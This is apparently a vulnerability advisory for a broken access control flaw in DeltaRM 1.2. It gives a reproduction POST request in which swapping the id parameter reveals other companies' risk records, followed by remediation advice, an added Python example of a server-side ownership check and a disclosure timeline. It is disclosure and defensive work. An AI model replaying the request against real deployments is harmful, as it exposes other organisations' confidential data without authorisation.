Last active January 17, 2022 10:34
  • Broken Access Controls in Risk Details between companies
  • Affected Product: DeltaRM 1.2
  • Vendor: DeltaRM
  • Severity: High
  • Vulnerability Class: Broken Access Controls
  • Status: Fixed
  • Author(s): Renato Cruz


An issue was discovered in Delta RM 1.2. Using the /risque/risque/ajax-details endpoint with a POST request whose id parameter names the risk to access, an authenticated user can read risks belonging to other companies.

Reproduction Steps

As an authenticated user, send the following request:

```http
POST /risque/risque/ajax-details HTTP/1.1
Cookie: PHPSESSID=*session cookie*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=*another company id*&evalId=&appel=
```


The application must validate the current user's roles and permissions on every request and guarantee that the user can only reach the features and data (here, the risks of their own company) they are allowed to see.

  • With the exception of public resources, deny by default.
  • Log access control failures, alert admins when appropriate (e.g. repeated failures).
  • Rate limit API and controller access to minimize the harm from automated attack tooling.
  • JWT tokens should be invalidated on the server after logout.
  • Developers and QA staff should include functional access control unit and integration tests.
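The following is an added illustration of the object-level check the recommendations describe; it is not DeltaRM's code (the application itself is PHP, as the PHPSESSID cookie shows). It models the ajax-details handler in Python with an in-memory store so it runs offline: the company is taken from the session, never from the request, every branch that cannot prove authorization denies, and each failure is logged with an alert on repeats. The names USERS, RISKS, AccessDenied, get_risk_details and the sample records are assumptions made for this example.

```python
"""Object-level authorization for a risk-details endpoint (added example).

Not DeltaRM's code: a stand-in for /risque/risque/ajax-details with an
in-memory store. USERS, RISKS, AccessDenied and get_risk_details are names
chosen for this illustration; the records below are constructed sample data.
"""
import logging
from collections import Counter

log = logging.getLogger("access-control")

# Constructed sample data: two companies, one risk each (hypothetical values).
USERS = {
    "alice": {"company_id": 100, "roles": {"risk_reader"}},
    "bob": {"company_id": 200, "roles": {"risk_reader"}},
    "mallory": {"company_id": 200, "roles": set()},  # authenticated, no role
}
RISKS = {
    1: {"company_id": 100, "title": "Supplier outage"},
    2: {"company_id": 200, "title": "Data centre flood"},
}

ALERT_THRESHOLD = 3  # repeated failures from one user raise an alert
_failures = Counter()


class AccessDenied(Exception):
    """Raised for any request that does not pass every authorization check."""


def _deny(session_user: str, risk_id, reason: str) -> None:
    """Log the access control failure, alert on repeats, then refuse."""
    _failures[session_user] += 1
    log.warning("access denied user=%s risk=%s reason=%s", session_user, risk_id, reason)
    if _failures[session_user] >= ALERT_THRESHOLD:
        log.error("ALERT repeated access failures user=%s count=%d",
                  session_user, _failures[session_user])
    raise AccessDenied(reason)


def vulnerable_details(session_user: str, risk_id: int) -> dict:
    """The flaw in the advisory: the id parameter is trusted as-is."""
    return RISKS[risk_id]


def get_risk_details(session_user: str, raw_id: str) -> dict:
    """Deny by default: only a fully proven request reaches the return."""
    user = USERS.get(session_user)
    if user is None:
        _deny(session_user, raw_id, "no authenticated user")
    if "risk_reader" not in user["roles"]:
        _deny(session_user, raw_id, "missing role")
    try:
        risk_id = int(raw_id)
    except (TypeError, ValueError):
        _deny(session_user, raw_id, "malformed id")
    risk = RISKS.get(risk_id)
    # Ownership comes from the session's company, never from the request.
    # Unknown and foreign risks get the same answer so ids cannot be enumerated.
    if risk is None or risk["company_id"] != user["company_id"]:
        _deny(session_user, risk_id, "risk not in caller's company")
    return risk


def failure_count(session_user: str) -> int:
    """Number of logged denials for a user (what an alert rule would read)."""
    return _failures[session_user]


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    print(get_risk_details("alice", "1")["title"])
    try:
        get_risk_details("alice", "2")
    except AccessDenied as exc:
        print("denied:", exc)
```

The vulnerable_details function is kept beside the hardened one only to make the difference visible: the fix is not validating the id format, it is comparing the record's owner with the caller's company on the server. The same shape of check belongs in an integration test that calls the endpoint with a foreign id and expects a denial, which is what the last recommendation above asks for.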

Disclosure Timeline

  • 26-10-2021: Vulnerability disclosed to DeltaRM
  • 28-10-2021: Acknowledgement from vendor
  • 11-12-2021: Fix released by the vendor
  • 10-01-2022: Retest performed, vulnerability fixed